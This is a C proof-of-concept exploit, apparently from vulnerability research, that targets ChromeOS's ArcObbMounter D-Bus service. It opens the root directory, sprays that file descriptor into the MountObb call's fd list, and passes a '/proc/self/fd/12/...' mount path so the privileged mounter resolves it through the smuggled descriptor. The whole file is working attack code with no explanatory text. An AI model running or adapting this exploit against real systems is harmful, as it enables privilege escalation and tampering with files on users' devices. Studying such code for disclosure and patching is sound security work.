#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <gio/gio.h>
#include <gio/gunixfdlist.h>

#define CHKNULL(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == NULL) \
    errx(1, "CHKNULL(" #x ")"); \
  __res;                      \
})

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static GDBusConnection *conn;
static GDBusProxy *proxy;

// deserialized at:
// https://chromium.googlesource.com/chromiumos/platform2/+/ff8b0b360bd380b8696271058d94114b79ec9ebd/arc/container/obb-mounter/service.cc#60
bool invoke_mount(char *obb_file, char *mount_path, int owner_gid, int sprayed_fd) {
  GUnixFDList *fd_list = g_unix_fd_list_new();
  if (sprayed_fd != -1) {
    for (int i=0; i<8; i++) {
      GError *fd_error = NULL;
      if (g_unix_fd_list_append(fd_list, sprayed_fd, &fd_error) == -1)
        errx(1, "unable to add fd: %s", fd_error->message);
    }
  }
  GError *error = NULL;
  GVariant *res = g_dbus_proxy_call_with_unix_fd_list_sync(proxy, "MountObb", g_variant_new("(ssi)", obb_file, mount_path, owner_gid), G_DBUS_CALL_FLAGS_NONE, G_MAXINT, fd_list, NULL, NULL, &error);
  if (res) {
    g_variant_unref(res);
    return true;
  } else if (g_error_matches (error, G_DBUS_ERROR, G_DBUS_ERROR_FAILED)) {
    g_error_free(error);
    return false;
  } else {
    if (error->message) {
      errx(1, "mount fail: %s (%d:%d)\n", error->message, error->domain, error->code);
    } else {
      errx(1, "mount fail: %d:%d\n", error->domain, error->code);
    }
  }
}

int main(void) {
  conn = CHKNULL(g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, NULL));
  // relevant policy at:
  // https://chromium.googlesource.com/chromiumos/platform2/+/ff8b0b360bd380b8696271058d94114b79ec9ebd/arc/container/obb-mounter/org.chromium.ArcObbMounter.conf
  proxy = CHKNULL(g_dbus_proxy_new_sync(conn, G_DBUS_PROXY_FLAGS_NONE, /*info*/NULL, "org.chromium.ArcObbMounter", "/org/chromium/ArcObbMounter", "org.chromium.ArcObbMounterInterface", NULL, NULL));
  printf("got DBus proxy\n");

  int rootfd = SYSCHK(open("/", O_PATH));
  printf("mount result: %d\n", (int)invoke_mount("/does/not/exist", "/proc/self/fd/12/dev/root_created", 655360, rootfd));
}
